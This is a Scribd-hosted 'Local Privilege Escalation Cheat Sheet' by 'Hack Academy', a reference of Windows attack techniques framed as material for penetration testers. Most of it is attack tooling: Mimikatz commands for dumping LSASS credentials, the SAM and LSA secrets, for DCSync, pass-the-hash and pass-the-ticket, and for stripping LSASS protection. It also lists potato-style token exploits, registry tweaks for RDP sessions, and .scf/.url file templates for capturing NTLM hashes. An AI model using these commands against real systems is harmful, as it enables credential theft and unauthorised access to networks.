Scribd
Upload
67 views

Hack Academy's Local Privilege Escalation Cheat Sheet ➤

The document is a comprehensive cheat sheet for Windows Local Privilege Escalation, detailing techniques, tools, and commands for effective exploitation and lateral movement. It includes specific methods such as Token Privilege Abuse, SMB and File Privilege Exploits, and the use of tools like Mimikatz and PowerShell Remoting. The guide is designed for penetration testers and cybersecurity enthusiasts, emphasizing the importance of ethical practices in hacking.

Uploaded by

commandothomastpdf
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
67 views

Hack Academy's Local Privilege Escalation Cheat Sheet ➤

The document is a comprehensive cheat sheet for Windows Local Privilege Escalation, detailing techniques, tools, and commands for effective exploitation and lateral movement. It includes specific methods such as Token Privilege Abuse, SMB and File Privilege Exploits, and the use of tools like Mimikatz and PowerShell Remoting. The guide is designed for penetration testers and cybersecurity enthusiasts, emphasizing the importance of ethical practices in hacking.

Uploaded by

commandothomastpdf
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 7

LOCAL PRIVILEGE ESCALATION

CHEAT SHEET
By Hack Academy
Table of Contents

• Privilege Escalation Techniques ................................................................................................. 3


• Token Privilege Abuse .................................................................................................................... 3
• SMB and File Privilege Exploits ................................................................................................... 3
• Privilege Escalation Tools ............................................................................................................. 4
• Lateral Movement ........................................................................................................................... 4
• PowerShell Remoting ..................................................................................................................... 4
• Mimikatz ............................................................................................................................................ 5
• Bypassing LSASS Protections ..................................................................................................... 5
• LSA As A Protected Process (Kernel-Land Bypass) ............................................................... 5
• Remote Desktop Protocol (RDP) ................................................................................................. 5
• Other Techniques ............................................................................................................................ 6
• URL File Attacks ............................................................................................................................... 6
• Notes on .scf File Attacks ............................................................................................................. 6
• Useful Tools for Attacks ................................................................................................................ 6
• Outro .................................................................................................................................................. 7

2 of 7
LOCAL PRIVILEGE ESCALATION CHEAT
SHEET
By Hack Academy

Introduction

Welcome to the Windows Local Privilege Escalation Cheat Sheet, your go-to guide for
navigating the tricky terrain of Windows privilege escalation and lateral movement.
Whether you're a penetration tester or a cybersecurity enthusiast, this document
organizes essential techniques, tools, and commands into a clear and structured format -
complete with detailed steps and compatibility notes. Tackle privilege escalation with
precision and confidence!

Privilege Escalation Techniques

Token Privilege Abuse

Technique Description Compatibility

Abuse SeImpersonate or ⚠ Up to Windows Server


Juicy Potato
SeAssignPrimaryToken privileges. 2016/Win10 1803

Lovely ⚠ Up to Windows Server


Automated Juicy Potato implementation.
Potato 2016/Win10 1803

Works on Windows Server


PrintSpoofer Exploit PrinterBug for SYSTEM impersonation.
2019/Win10

Works on Windows Server


RoguePotato Upgraded version of Juicy Potato.
2019/Win10

SMB and File Privilege Exploits

Exploit Description Reference

SMBGhost (CVE-2020-0796) Memory corruption vulnerability in SMBv3. PoC available

3 of 7
Exploit Description Reference

HiveNightmare Exploit access to SAM, SYSTEM, and aka


(CVE-2021-36934) SECURITY registry files. SeriousSAM

Privilege Escalation Tools

Tool Description

PowerUp Detect and exploit misconfigurations.

BeRoot General LPE enumeration tool.

Privesc Alternative enumeration tool.

FullPowers Restore a service account's privileges.

Lateral Movement

PowerShell Remoting

Task Command

Enable PowerShell
Enable-PSRemoting
Remoting

Start a PSSession $sess = New-PSSession -ComputerName

Enter-PSSession -ComputerName or Enter-PSSession -


Enter a PSSession
Session

Remote Command Invoke-Command -ComputerName -Credential $Cred -


Execution ScriptBlock {whoami}

Import and Execute a Invoke-Command -Credential $Cred -ComputerName -


PowerShell Module FilePath -Session $sess

4 of 7
Mimikatz

Task Command

Dump LSASS Credentials sekurlsa::logonpasswords

Over-Pass-the-Hash sekurlsa::pth /user: /ntlm: /domain:

List Kerberos Tickets sekurlsa::tickets

Dump and Save LSASS to File sekurlsa::minidump c:\temp\lsass.dmp

Dump SAM Database lsadump::sam

Dump SECRETS Database lsadump::secrets

DCSync Attack lsadump::dcsync /domain: /user: /history

List and Dump Kerberos Credentials kerberos::list /dump

Pass-The-Ticket kerberos::ptt

Bypassing LSASS Protections

LSA As A Protected Process (Kernel-Land Bypass)

Step Command

Check LSA Protection


reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
Status

mimikatz # !processprotect /process:lsass.exe /


Remove Protection Flags
remove

Dump LSASS After Bypass mimikatz # sekurlsa::logonpasswords

Remote Desktop Protocol (RDP)

Technique Description Command

Use RDP
protocol for
Pass-The-Hash via sekurlsa::pth /user: /domain: /ntlm: /
hash-based
RestrictedAdmin run:"mstsc.exe /restrictedadmin"
lateral
movement.

5 of 7
Technique Description Command

REG ADD
Bypass Single Allow multiple
"HKLM\SOFTWARE\Policies\Microsoft\Windows
Session sessions for a
NT\Terminal Services" /v fSingleSessionPerUser
Restriction single user.
/t REG_DWORD /d 0

Remove
Reinstate Single multiple REG DELETE
Session session "HKLM\SOFTWARE\Policies\Microsoft\Windows
Restriction setting after NT\Terminal Services" /v fSingleSessionPerUser
use.

Other Techniques

URL File Attacks

File Type Example

.url [InternetShortcut] URL=file:///path

.scf [Shell] Command=2 IconFile=\\\Share\test.ico

Notes on .scf File Attacks

.scf attacks no longer work on the latest Windows versions.

Use Responder to capture hashes when the victim navigates to the share.

Useful Tools for Attacks

Tool Description

Powercat Netcat in PowerShell; supports tunneling, relaying, and port forwarding.

SCShell Fileless lateral movement using ChangeServiceConfigA.

Evil-WinRM A powerful WinRM shell for pentesting.

RunasCs Open-source version of runas.exe.

NTLM_Theft Generates various file formats for NTLM hash capture (e.g., .url and .scf).

6 of 7
Outro

Mastering privilege escalation is a vital skill in ethical hacking, but always remember to
operate within legal and ethical boundaries. This cheat sheet provides a streamlined
overview to help you efficiently identify and exploit vulnerabilities for educational and
authorized purposes. Happy hacking, and may your exploits be effective and your
engagements fruitful!

7 of 7

You might also like